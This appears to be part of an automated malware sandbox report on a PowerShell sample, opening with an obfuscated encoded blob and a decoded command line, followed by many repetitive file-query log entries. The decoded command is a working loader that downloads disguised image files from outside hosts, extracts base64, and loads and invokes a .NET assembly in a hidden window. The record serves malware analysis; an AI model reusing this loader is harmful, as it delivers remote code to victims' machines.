'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@cJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] ('txt.dfgdmai/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
